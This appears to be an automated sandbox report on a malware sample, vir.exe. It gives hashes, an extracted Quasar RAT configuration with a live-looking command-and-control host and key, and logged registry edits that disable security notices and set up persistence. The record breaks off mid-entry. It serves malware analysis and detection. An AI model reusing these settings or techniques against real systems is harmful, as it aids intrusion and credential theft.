Resubmissions
17-01-2025 11:40
250117-ns1f3svrfx 1026-12-2024 15:01
241226-sec6vayjgx 1027-09-2024 10:28
240927-mh3m1sxgrm 1018-08-2024 19:49
240818-yjmtqsthkm 1018-08-2024 14:30
240818-rvdxmsxgjg 1015-08-2024 23:29
240815-3g3jmawdnq 1015-08-2024 23:15
240815-28syts1brg 10Analysis
-
max time kernel
301s -
max time network
310s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-01-2025 11:40
Behavioral task
behavioral1
Sample
vir.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
vir.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
vir.exe
Resource
android-33-x64-arm64-20240624-en
Behavioral task
behavioral4
Sample
vir.exe
Resource
android-33-x64-arm64-20240624-en
Behavioral task
behavioral5
Sample
vir.exe
Resource
macos-20241106-en
Behavioral task
behavioral6
Sample
vir.exe
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral7
Sample
vir.exe
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral8
Sample
vir.exe
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral9
Sample
vir.exe
Resource
debian9-mipsel-20240611-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000500000001a4b0-217.dat family_umbral behavioral1/memory/2236-5890-0x0000000000CE0000-0x0000000000D20000-memory.dmp family_umbral -
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
-
MassLogger Main payload 3 IoCs
resource yara_rule behavioral1/memory/3636-6501-0x0000000000400000-0x0000000000541000-memory.dmp family_masslogger behavioral1/memory/3636-6513-0x0000000001E10000-0x0000000001EAA000-memory.dmp family_masslogger behavioral1/memory/3636-6579-0x0000000000400000-0x0000000000541000-memory.dmp family_masslogger -
Masslogger family
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" dxwbwewlne.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" dxwbwewlne.exe -
Njrat family
-
Quasar family
-
Quasar payload 12 IoCs
resource yara_rule behavioral1/files/0x000500000001a483-213.dat family_quasar behavioral1/memory/2884-4387-0x0000000000A90000-0x0000000000DB4000-memory.dmp family_quasar behavioral1/memory/1692-4417-0x0000000000AA0000-0x0000000000DC4000-memory.dmp family_quasar behavioral1/memory/1836-4520-0x0000000000100000-0x0000000000424000-memory.dmp family_quasar behavioral1/memory/2916-4748-0x0000000000150000-0x0000000000474000-memory.dmp family_quasar behavioral1/memory/2908-5146-0x0000000000D00000-0x0000000001024000-memory.dmp family_quasar behavioral1/memory/2404-5321-0x0000000001070000-0x0000000001394000-memory.dmp family_quasar behavioral1/memory/2348-5806-0x0000000005A70000-0x0000000005EAE000-memory.dmp family_quasar behavioral1/memory/2156-6082-0x0000000000220000-0x0000000000544000-memory.dmp family_quasar behavioral1/memory/3196-6202-0x0000000001060000-0x0000000001384000-memory.dmp family_quasar behavioral1/memory/2064-6265-0x00000000001D0000-0x00000000004F4000-memory.dmp family_quasar behavioral1/memory/1104-6327-0x0000000000D10000-0x0000000001034000-memory.dmp family_quasar -
Umbral family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" dxwbwewlne.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 25 2388 mshta.exe 26 2388 mshta.exe 28 2388 mshta.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" dxwbwewlne.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\DRIVERS\SETEF8D.tmp DrvInst.exe File created C:\Windows\system32\DRIVERS\SETEF8D.tmp DrvInst.exe File opened for modification C:\Windows\system32\DRIVERS\droidcam.sys DrvInst.exe -
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\C71B5D1228C8E5CA897A8B158AA48CA8E17E7915\Blob = 0f00000001000000140000007adbd77e720fb9601046c75d3c7b6008773f6fd90200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000640066003800650033006600380032002d0064003600320065002d0034003300320030002d0038003100630039002d0037003000300035006100340038006300300037003900330000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000c71b5d1228c8e5ca897a8b158aa48ca8e17e7915200000000100000000030000308202fc308201e4a00302010202104ecb568d16cde3b8482859bed802249b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3235303131373131343235315a180f32313234313232343131343235315a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b49f5921132fdbad5526546de6df0b539ff8ea1d3d8f4cf184342b0e616db69dc33973073cbc691711948894df298fbe666ef24758d0d914a8fb3b6178f7aa82ba0e79016aea6f637b3928e4bbbade1055a980a7a867febdd7fe1600f6a707e125ec3b97f3f5604ec9dedf3e4441d5157787ba999b7210869a341056741f0b5277764073dda85cb503f886359404f89b4f565d301196b9a04f465e79279db5e166ba7ca985666102313073e0d0f4f638ba58131293c797f9c91c4163f3eaadf94871a0d1a4a92a2ec44cf3b3a3325c6f38b1cbce05883e5ff5963c89dfd3fc00eb4fe68f16000cde3d6bc5b0dba39ec1af979371e50ab3837c23f96c2af0e20d0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e405a5141424f5057450030090603551d1304023000300d06092a864886f70d0101050500038201010055aaa7dcdf50ffbebe645669983c2df90d61c058ccca8802d57f4c4cf600e6f02eab34cf12535c5c6f59b79b88b2728a1d824dde405e48900ad52f0d3df221ded29b4fe98ca3ffc238c2118b817d38b684cdfc12a4d204db3bf4c79240bdb0d229d236a9c4285c82714bed0483e2b8ead3110da66aa3e3ca7172c7b508b854f589dfba61d92a6bd0424c81884aa7b6953f64e55fd9bbc171db561e9ebef724fdfc9226191aaa5699b6b1c3959cd2c563957247b4287a1ac88c5bd7f9dfa4ada193c85331cf605b3fcd105adbcd428911dfba77b4e09847c6b68ca671118fb97e6b59ea856199c406e41ae12fc8c1e3cd3afa1d0d5c7a937d71cc4525a4c0fdd9 IEXPLORE.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\C71B5D1228C8E5CA897A8B158AA48CA8E17E7915\Blob = 0f00000001000000140000007adbd77e720fb9601046c75d3c7b6008773f6fd9030000000100000014000000c71b5d1228c8e5ca897a8b158aa48ca8e17e7915200000000100000000030000308202fc308201e4a00302010202104ecb568d16cde3b8482859bed802249b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3235303131373131343235315a180f32313234313232343131343235315a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b49f5921132fdbad5526546de6df0b539ff8ea1d3d8f4cf184342b0e616db69dc33973073cbc691711948894df298fbe666ef24758d0d914a8fb3b6178f7aa82ba0e79016aea6f637b3928e4bbbade1055a980a7a867febdd7fe1600f6a707e125ec3b97f3f5604ec9dedf3e4441d5157787ba999b7210869a341056741f0b5277764073dda85cb503f886359404f89b4f565d301196b9a04f465e79279db5e166ba7ca985666102313073e0d0f4f638ba58131293c797f9c91c4163f3eaadf94871a0d1a4a92a2ec44cf3b3a3325c6f38b1cbce05883e5ff5963c89dfd3fc00eb4fe68f16000cde3d6bc5b0dba39ec1af979371e50ab3837c23f96c2af0e20d0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e405a5141424f5057450030090603551d1304023000300d06092a864886f70d0101050500038201010055aaa7dcdf50ffbebe645669983c2df90d61c058ccca8802d57f4c4cf600e6f02eab34cf12535c5c6f59b79b88b2728a1d824dde405e48900ad52f0d3df221ded29b4fe98ca3ffc238c2118b817d38b684cdfc12a4d204db3bf4c79240bdb0d229d236a9c4285c82714bed0483e2b8ead3110da66aa3e3ca7172c7b508b854f589dfba61d92a6bd0424c81884aa7b6953f64e55fd9bbc171db561e9ebef724fdfc9226191aaa5699b6b1c3959cd2c563957247b4287a1ac88c5bd7f9dfa4ada193c85331cf605b3fcd105adbcd428911dfba77b4e09847c6b68ca671118fb97e6b59ea856199c406e41ae12fc8c1e3cd3afa1d0d5c7a937d71cc4525a4c0fdd9 IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\C71B5D1228C8E5CA897A8B158AA48CA8E17E7915\Blob = 0f00000001000000140000007adbd77e720fb9601046c75d3c7b6008773f6fd9030000000100000014000000c71b5d1228c8e5ca897a8b158aa48ca8e17e79150200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000640066003800650033006600380032002d0064003600320065002d0034003300320030002d0038003100630039002d0037003000300035006100340038006300300037003900330000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000200000000100000000030000308202fc308201e4a00302010202104ecb568d16cde3b8482859bed802249b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3235303131373131343235315a180f32313234313232343131343235315a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b49f5921132fdbad5526546de6df0b539ff8ea1d3d8f4cf184342b0e616db69dc33973073cbc691711948894df298fbe666ef24758d0d914a8fb3b6178f7aa82ba0e79016aea6f637b3928e4bbbade1055a980a7a867febdd7fe1600f6a707e125ec3b97f3f5604ec9dedf3e4441d5157787ba999b7210869a341056741f0b5277764073dda85cb503f886359404f89b4f565d301196b9a04f465e79279db5e166ba7ca985666102313073e0d0f4f638ba58131293c797f9c91c4163f3eaadf94871a0d1a4a92a2ec44cf3b3a3325c6f38b1cbce05883e5ff5963c89dfd3fc00eb4fe68f16000cde3d6bc5b0dba39ec1af979371e50ab3837c23f96c2af0e20d0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e405a5141424f5057450030090603551d1304023000300d06092a864886f70d0101050500038201010055aaa7dcdf50ffbebe645669983c2df90d61c058ccca8802d57f4c4cf600e6f02eab34cf12535c5c6f59b79b88b2728a1d824dde405e48900ad52f0d3df221ded29b4fe98ca3ffc238c2118b817d38b684cdfc12a4d204db3bf4c79240bdb0d229d236a9c4285c82714bed0483e2b8ead3110da66aa3e3ca7172c7b508b854f589dfba61d92a6bd0424c81884aa7b6953f64e55fd9bbc171db561e9ebef724fdfc9226191aaa5699b6b1c3959cd2c563957247b4287a1ac88c5bd7f9dfa4ada193c85331cf605b3fcd105adbcd428911dfba77b4e09847c6b68ca671118fb97e6b59ea856199c406e41ae12fc8c1e3cd3afa1d0d5c7a937d71cc4525a4c0fdd9 IEXPLORE.EXE -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2600 netsh.exe -
Possible privilege escalation attempt 5 IoCs
pid Process 2056 icacls.exe 3832 takeown.exe 4048 icacls.exe 1820 icacls.exe 3456 takeown.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/2132-370-0x0000000005C50000-0x00000000061A0000-memory.dmp net_reactor behavioral1/memory/2132-374-0x00000000062A0000-0x00000000067EE000-memory.dmp net_reactor behavioral1/memory/2132-376-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-375-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-390-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-398-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-514-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-512-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-510-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-508-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-506-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-504-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-502-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-396-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-394-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-498-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-392-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-496-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-494-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-492-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-490-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-488-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-486-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-484-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-482-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-480-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-478-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-476-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-388-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-386-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-384-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-382-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-380-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-378-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor behavioral1/memory/2132-474-0x00000000062A0000-0x00000000067E9000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\International\Geo\Nation sjhkhda.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs notepad.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 49 IoCs
pid Process 2132 Rover.exe 956 Google.exe 4088 regmess.exe 2792 1.exe 2704 3.exe 2912 WinaeroTweaker-1.40.0.0-setup.exe 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2264 psiphon-tunnel-core.exe 2884 scary.exe 2744 the.exe 584 wimloader.dll 1692 Romilyaa.exe 1836 Romilyaa.exe 3276 ac3.exe 3744 vc_redist.x86.exe 3304 vc_redist.x86.exe 3848 insdrv.exe 2916 Romilyaa.exe 2908 Romilyaa.exe 2404 Romilyaa.exe 2580 Romilyaa.exe 2392 Romilyaa.exe 1736 freebobux.exe 2568 SolaraBootstraper.exe 2596 wim.dll 932 CLWCP.exe 3640 SolaraBootstrapper.exe 2236 Umbral.exe 1856 !FIXInj.exe 2156 Romilyaa.exe 3196 Romilyaa.exe 2588 f3cb220f1aaa32ca310586e5f62dcab1.exe 2064 Romilyaa.exe 1104 Romilyaa.exe 2052 jaffa.exe 1908 jkka.exe 3480 dxwbwewlne.exe 3708 zyrnalmo.exe 3332 yjpiisywuzrev.exe 1872 eususxtzrybfydh.exe 1608 selfaware.exe 988 sjhkhda.exe 3304 selfaware.exe 3636 sjhkhda.exe 1040 sjhkhda.exe 1488 packer.exe 1376 zyrnalmo.exe 292 selfaware.exe 1340 selfaware.exe -
Loads dropped DLL 64 IoCs
pid Process 2348 cmd.exe 2348 cmd.exe 2348 cmd.exe 4080 cmd.exe 4080 cmd.exe 2792 1.exe 2836 cmd.exe 2792 1.exe 2912 WinaeroTweaker-1.40.0.0-setup.exe 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2704 3.exe 2704 3.exe 2348 cmd.exe 2348 cmd.exe 2348 cmd.exe 1716 Process not Found 2348 cmd.exe 2348 cmd.exe 2792 1.exe 2792 1.exe 3744 vc_redist.x86.exe 3304 vc_redist.x86.exe 832 regsvr32.exe 2796 regsvr32.exe 2732 regsvr32.exe 2792 1.exe 2792 1.exe 1664 Process not Found 2792 1.exe 2792 1.exe 2792 1.exe 2792 1.exe 2792 1.exe 2348 cmd.exe 2348 cmd.exe 2348 cmd.exe 2348 cmd.exe 2348 cmd.exe 1716 cmd.exe 1716 cmd.exe 2568 SolaraBootstraper.exe 2568 SolaraBootstraper.exe 2568 SolaraBootstraper.exe 2348 cmd.exe 2348 cmd.exe 2348 cmd.exe 2348 cmd.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2348 cmd.exe 2348 cmd.exe 832 notepad.exe 832 notepad.exe 1608 selfaware.exe 2692 vir.exe 3480 dxwbwewlne.exe 3304 selfaware.exe 3304 selfaware.exe -
Modifies file permissions 1 TTPs 5 IoCs
pid Process 3456 takeown.exe 2056 icacls.exe 3832 takeown.exe 4048 icacls.exe 1820 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 196.245.172.58 Destination IP 139.162.228.221 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirstRunDisabled = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" dxwbwewlne.exe -
Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\jlaqnjek = "dxwbwewlne.exe" eususxtzrybfydh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ugjjrvef = "eususxtzrybfydh.exe" eususxtzrybfydh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "yjpiisywuzrev.exe" eususxtzrybfydh.exe Set value (str) 